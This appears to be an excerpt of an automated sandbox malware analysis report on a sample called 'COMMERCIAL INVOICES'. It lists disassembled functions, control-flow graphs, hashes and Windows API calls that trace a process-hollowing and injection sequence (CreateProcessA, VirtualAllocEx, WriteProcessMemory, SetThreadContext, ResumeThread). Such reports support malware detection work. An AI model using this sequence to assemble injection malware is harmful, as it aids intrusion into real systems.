                                                                                                                                                                                                                                      • Opcode ID: 837e383d8ca6280b1af4e273ec441290540722128a9b48713ae94319402a65e0
                                                                                                                                                                                                                                      • Instruction ID: 624ef18f4987d7e47a14f967c5049160deda646c479a590f47ea591be9bb5af3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 837e383d8ca6280b1af4e273ec441290540722128a9b48713ae94319402a65e0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 315159B4A007498FDB14DFA9D948BAEBFF1FF49304F208599E509A73A0D7385984CB61
                                                                                                                                                                                                                                      Function 02BAD040 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 548 2bad040-2bad0cf GetCurrentProcess 552 2bad0d8-2bad10c GetCurrentThread 548->552 553 2bad0d1-2bad0d7 548->553 554 2bad10e-2bad114 552->554 555 2bad115-2bad149 GetCurrentProcess 552->555 553->552 554->555 557 2bad14b-2bad151 555->557 558 2bad152-2bad16d call 2bad621 555->558 557->558 561 2bad173-2bad1a2 GetCurrentThreadId 558->561 562 2bad1ab-2bad20d 561->562 563 2bad1a4-2bad1aa 561->563 563->562
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 02BAD0BE
                                                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 02BAD0FB
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 02BAD138
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02BAD191
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2378013072.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2ba0000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Current$ProcessThread
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2063062207-0
                                                                                                                                                                                                                                      • Opcode ID: 542bb7fce4af6d6116a72ba84d1e409318584874ca0d8b9bfe26c107d159232a
                                                                                                                                                                                                                                      • Instruction ID: bc43707a83bdcc65866097e6f1fa3de45d49097d07e844e3f20f12b8c5d91047
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 542bb7fce4af6d6116a72ba84d1e409318584874ca0d8b9bfe26c107d159232a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F5178B49007498FDB14DFA9D948BAEBBF5FF48304F208599E409A7360D7385984CB61
                                                                                                                                                                                                                                      Function 07134D5C Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 666 7134d5c-7134dfd 669 7134e36-7134e56 666->669 670 7134dff-7134e09 666->670 677 7134e58-7134e62 669->677 678 7134e8f-7134ebe 669->678 670->669 671 7134e0b-7134e0d 670->671 672 7134e30-7134e33 671->672 673 7134e0f-7134e19 671->673 672->669 675 7134e1b 673->675 676 7134e1d-7134e2c 673->676 675->676 676->676 680 7134e2e 676->680 677->678 679 7134e64-7134e66 677->679 686 7134ec0-7134eca 678->686 687 7134ef7-7134fb1 CreateProcessA 678->687 681 7134e89-7134e8c 679->681 682 7134e68-7134e72 679->682 680->672 681->678 684 7134e76-7134e85 682->684 685 7134e74 682->685 684->684 688 7134e87 684->688 685->684 686->687 689 7134ecc-7134ece 686->689 698 7134fb3-7134fb9 687->698 699 7134fba-7135040 687->699 688->681 691 7134ef1-7134ef4 689->691 692 7134ed0-7134eda 689->692 691->687 693 7134ede-7134eed 692->693 694 7134edc 692->694 693->693 696 7134eef 693->696 694->693 696->691 698->699 709 7135042-7135046 699->709 710 7135050-7135054 699->710 709->710 711 7135048 709->711 712 7135056-713505a 710->712 713 7135064-7135068 710->713 711->710 712->713 716 713505c 712->716 714 713506a-713506e 713->714 715 7135078-713507c 713->715 714->715 717 7135070 714->717 718 713508e-7135095 715->718 719 713507e-7135084 715->719 716->713 717->715 720 7135097-71350a6 718->720 721 71350ac 718->721 719->718 720->721 723 71350ad 721->723 723->723
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07134F9E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                                                                                                      • Opcode ID: 473d4d85e45cb8ea9213083ffdac7804f9ea82d9aa57124a1d95f35799f4a49d
                                                                                                                                                                                                                                      • Instruction ID: f7a1781608834ac7e5089b309c832510121e8abe78d2035c67ab2f98421857ad
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 473d4d85e45cb8ea9213083ffdac7804f9ea82d9aa57124a1d95f35799f4a49d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71A17CB0D0025ADFDB21CF68C891BEDBBB2FF48314F1485A9D809A7290DB759985CF91
                                                                                                                                                                                                                                      Function 07134D68 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 724 7134d68-7134dfd 726 7134e36-7134e56 724->726 727 7134dff-7134e09 724->727 734 7134e58-7134e62 726->734 735 7134e8f-7134ebe 726->735 727->726 728 7134e0b-7134e0d 727->728 729 7134e30-7134e33 728->729 730 7134e0f-7134e19 728->730 729->726 732 7134e1b 730->732 733 7134e1d-7134e2c 730->733 732->733 733->733 737 7134e2e 733->737 734->735 736 7134e64-7134e66 734->736 743 7134ec0-7134eca 735->743 744 7134ef7-7134fb1 CreateProcessA 735->744 738 7134e89-7134e8c 736->738 739 7134e68-7134e72 736->739 737->729 738->735 741 7134e76-7134e85 739->741 742 7134e74 739->742 741->741 745 7134e87 741->745 742->741 743->744 746 7134ecc-7134ece 743->746 755 7134fb3-7134fb9 744->755 756 7134fba-7135040 744->756 745->738 748 7134ef1-7134ef4 746->748 749 7134ed0-7134eda 746->749 748->744 750 7134ede-7134eed 749->750 751 7134edc 749->751 750->750 753 7134eef 750->753 751->750 753->748 755->756 766 7135042-7135046 756->766 767 7135050-7135054 756->767 766->767 768 7135048 766->768 769 7135056-713505a 767->769 770 7135064-7135068 767->770 768->767 769->770 773 713505c 769->773 771 713506a-713506e 770->771 772 7135078-713507c 770->772 771->772 774 7135070 771->774 775 713508e-7135095 772->775 776 713507e-7135084 772->776 773->770 774->772 777 7135097-71350a6 775->777 778 71350ac 775->778 776->775 777->778 780 71350ad 778->780 780->780
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07134F9E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                                                                                                      • Opcode ID: 4c997e79a885b00dd8ad5547796e40ab4c25817e01d0c025766f0af8a54875ff
                                                                                                                                                                                                                                      • Instruction ID: 70fa8d06ea9fc134cbe8c646fc8290b9fa6bb59f07bb0a9d3c8b958076b23991
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c997e79a885b00dd8ad5547796e40ab4c25817e01d0c025766f0af8a54875ff
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6916BB1D0025ACFEB21CF68C851BEDBBB2FF48314F1485A9D809A7290DB759985CF91
                                                                                                                                                                                                                                      Function 02BA5910 Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 781 2ba5910-2ba5914 782 2ba58b1-2ba58d9 781->782 783 2ba5916 781->783 786 2ba58db-2ba58e1 782->786 787 2ba58e2-2ba5903 782->787 784 2ba5918-2ba59d9 CreateActCtxA 783->784 789 2ba59db-2ba59e1 784->789 790 2ba59e2-2ba5a3c 784->790 786->787 789->790 798 2ba5a4b-2ba5a4f 790->798 799 2ba5a3e-2ba5a41 790->799 800 2ba5a60-2ba5a90 798->800 801 2ba5a51-2ba5a5d 798->801 799->798 805 2ba5a42-2ba5a44 800->805 806 2ba5a92-2ba5b14 800->806 801->800 805->798
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 02BA59C9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2378013072.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2ba0000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Create
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                                                                                      • Opcode ID: 88c26b01d16f1ad272138df7288bada6121555e303d18140c29f67dd05315acb
                                                                                                                                                                                                                                      • Instruction ID: 3a16ec4dc3dad4f9e447c26ceb8b7ef23ce6f7994aeb351609a073b91642e4e3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 88c26b01d16f1ad272138df7288bada6121555e303d18140c29f67dd05315acb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F5113B1C00719CFDB24DFAAC88479EBBF5BF49304F2080AAD419AB251D7756A49CF90
                                                                                                                                                                                                                                      Function 02BA44B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 808 2ba44b4-2ba59d9 CreateActCtxA 811 2ba59db-2ba59e1 808->811 812 2ba59e2-2ba5a3c 808->812 811->812 819 2ba5a4b-2ba5a4f 812->819 820 2ba5a3e-2ba5a41 812->820 821 2ba5a60-2ba5a90 819->821 822 2ba5a51-2ba5a5d 819->822 820->819 826 2ba5a42-2ba5a44 821->826 827 2ba5a92-2ba5b14 821->827 822->821 826->819
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 02BA59C9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2378013072.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2ba0000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Create
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                                                                                      • Opcode ID: ed8257b4e08cdf241ee04a323c05ae7ac5addb136a8765af5d9f1eb8d9e9b0f0
                                                                                                                                                                                                                                      • Instruction ID: 91a332e27654cf7ef6fe0f8e75884e3d658a1ec9283a819888b55f8a523f96f4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed8257b4e08cdf241ee04a323c05ae7ac5addb136a8765af5d9f1eb8d9e9b0f0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D4104B0D0071DCBDB24CFA9C84478EBBB5FF49304F20806AD419AB255DB755945CF90
                                                                                                                                                                                                                                      Function 071346D8 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 829 71346d8-71346dd 830 71346f1-713472e 829->830 831 71346df-71346ee 829->831 834 7134730-713473c 830->834 835 713473e-713477d WriteProcessMemory 830->835 831->830 834->835 837 7134786-71347b6 835->837 838 713477f-7134785 835->838 838->837
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07134770
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                                                                                                                      • Opcode ID: 3627f8952feef1ccb0903f1780d1e0d20560237b186d7e4dcd0914997a4f757e
                                                                                                                                                                                                                                      • Instruction ID: bbaaefaf5ebf5bf55ffd952698779965a9dff931193d4ceb336bdf3ceca9f9d6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3627f8952feef1ccb0903f1780d1e0d20560237b186d7e4dcd0914997a4f757e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55215AB59003499FCB10DFAAC885BEEBFF5FF49310F508429E958A7250C7789944CBA0
                                                                                                                                                                                                                                      Function 071346E0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 842 71346e0-713472e 845 7134730-713473c 842->845 846 713473e-713477d WriteProcessMemory 842->846 845->846 848 7134786-71347b6 846->848 849 713477f-7134785 846->849 849->848
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07134770
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                                                                                                                      • Opcode ID: 13c4fca8b3261109420435a056f1cc69a8bb361536dc60ba09484ee5988f4148
                                                                                                                                                                                                                                      • Instruction ID: 9ac0225af5065daa332499796208044bec99a59bc3e243ffc117bf071d406981
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 13c4fca8b3261109420435a056f1cc69a8bb361536dc60ba09484ee5988f4148
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A2136B59003599FCB10DFAAC885BEEBFF5FF48310F10842AE919A7250C7789944CBA0
                                                                                                                                                                                                                                      Function 07134540 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 853 7134540-7134593 855 71345a3-71345d3 Wow64SetThreadContext 853->855 856 7134595-71345a1 853->856 858 71345d5-71345db 855->858 859 71345dc-713460c 855->859 856->855 858->859
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071345C6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                                                                                      • Opcode ID: 9c8594999713e9bf52508ae045e6ad7ad32a77affeec8286f801cb34d0715110
                                                                                                                                                                                                                                      • Instruction ID: 7e4256c8d8ff441ea6bff159ad062cef97476e80aa49f5cc3bb30955c47bf26e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c8594999713e9bf52508ae045e6ad7ad32a77affeec8286f801cb34d0715110
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE2168B1D002498FDB10DFAAC4847EEBFF1EF88310F10842AD859A7240CB789945CFA0
                                                                                                                                                                                                                                      Function 07134BC8 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 863 7134bc8-7134c5d ReadProcessMemory 867 7134c66-7134c96 863->867 868 7134c5f-7134c65 863->868 868->867
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07134C50
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1726664587-0
                                                                                                                                                                                                                                      • Opcode ID: 21ac0a55fd63169499a09df59d64f9744d224dbbbe19f6b2e94f08d73ccbee4b
                                                                                                                                                                                                                                      • Instruction ID: edb42f4bcec31409618987e554b8d1c4eb005f8ca9241651fc9729c5e5c2ed63
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21ac0a55fd63169499a09df59d64f9744d224dbbbe19f6b2e94f08d73ccbee4b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 562119B1D002599FCF14DFAAC985AEEBBF5FF48310F508429E959A7250C7399944CBA0
                                                                                                                                                                                                                                      Function 02BAD689 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 872 2bad689-2bad724 DuplicateHandle 873 2bad72d-2bad74a 872->873 874 2bad726-2bad72c 872->874 874->873
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02BAD717
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2378013072.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2ba0000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                                                                                                                      • Opcode ID: d50fa6c133fcb8ee39cd201805e28f958e5f75b61ce22547fe3885b60cb35f8a
                                                                                                                                                                                                                                      • Instruction ID: 013119b089b66b3196d4ab77f09cf77f27020e3cf74aa0a3e72275d86cc0c977
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d50fa6c133fcb8ee39cd201805e28f958e5f75b61ce22547fe3885b60cb35f8a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8021E4B5900249DFDB10CFAAD984ADEBFF5FB48314F14845AE918A7350C378A944CFA1
                                                                                                                                                                                                                                      Function 07134548 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071345C6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                                                                                      • Opcode ID: b0027b4f62ce2cdf804330a5039f0a114bc58c6e431673b2e149a69956cad1f3
                                                                                                                                                                                                                                      • Instruction ID: c765f363fbcfc749a1e75d5ae56d53595aa099a57b7021299a28bd712aed81eb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0027b4f62ce2cdf804330a5039f0a114bc58c6e431673b2e149a69956cad1f3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 312149B1D003098FDB10DFAAC4857EEBBF4EF88310F10842AD819A7240CB78A944CFA0
                                                                                                                                                                                                                                      Function 07134BD0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07134C50
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1726664587-0
                                                                                                                                                                                                                                      • Opcode ID: ace6bcfb25c255619efb14560328051e7785a30c4211fed9ac3c2b86a3cdaa5f
                                                                                                                                                                                                                                      • Instruction ID: e58288c15cd122e09c60b56d9002598d1f0d20e55806f411059fe24cca840214
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ace6bcfb25c255619efb14560328051e7785a30c4211fed9ac3c2b86a3cdaa5f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 052109B1D003599FCB10DFAAC985AEEFBF5FF48310F508429E959A7250C7789544CBA0
                                                                                                                                                                                                                                      Function 02BAD690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02BAD717
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2378013072.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2ba0000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                                                                                                                      • Opcode ID: 041f5ad65a5965da99dfa9cdf72a47af84ad5ea29f78199e1e2878fac329c4c6
                                                                                                                                                                                                                                      • Instruction ID: 8a3152565c4ead50400b855126c4c8fd6a473855e8e6c78e4be28f2e402af2ad
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 041f5ad65a5965da99dfa9cdf72a47af84ad5ea29f78199e1e2878fac329c4c6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F21C4B59002499FDB10CF9AD584ADEBFF9FB48310F14845AE918A3350D378A954CFA5
                                                                                                                                                                                                                                      Function 07134619 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0713468E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                                                                      • Opcode ID: 9a0fb9e91cf00e787161bc0812ff42e017e1d78f13969febcfed69a44c9428f8
                                                                                                                                                                                                                                      • Instruction ID: 88ba93e9473b2dd1ee01aa2e3f7f3139e90b51db66c24b384eeab4750ec06a02
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9a0fb9e91cf00e787161bc0812ff42e017e1d78f13969febcfed69a44c9428f8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 172129B58002499FCB10DFAAC844AEFBFF5EF89320F248819E559A7250C7799950CFA0
                                                                                                                                                                                                                                      Function 07134491 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                                                                                                      • Opcode ID: 7404e8f7cb88b468d29f288b4b372411c73de5c39663f0d2ee59224fb43fcdc4
                                                                                                                                                                                                                                      • Instruction ID: 9fe2b50d2aa9c30535889046c850be1c8f2497cc61df87b9e8f74cc9a6ea4852
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7404e8f7cb88b468d29f288b4b372411c73de5c39663f0d2ee59224fb43fcdc4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16115EB1C003898FCB10DFAAC5457AEFFF5EF89320F248419D459A7250C7796944CBA4
                                                                                                                                                                                                                                      Function 07134620 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0713468E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
